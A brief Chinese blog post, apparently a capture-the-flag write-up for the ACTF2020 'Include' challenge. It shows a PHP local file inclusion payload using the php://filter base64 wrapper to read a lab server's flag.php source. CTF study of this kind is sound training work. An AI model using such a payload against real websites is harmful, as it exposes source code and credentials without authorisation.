[ACTF2020 新生赛]Include

点击tips后,发现url可能存在文件包含漏洞

http://42756bdc-671e-4064-b3eb-bf7c61903417.node3.buuoj.cn/?file=flag.php

使用php伪协议进行flag.php的文件读取

http://42756bdc-671e-4064-b3eb-bf7c61903417.node3.buuoj.cn/?file=php://filter/read=convert.base64-encode/resource=flag.php

解密后便得到flag

posted @ 2020-07-01 10:52  GTX690M  阅读(291)  评论(0)    收藏  举报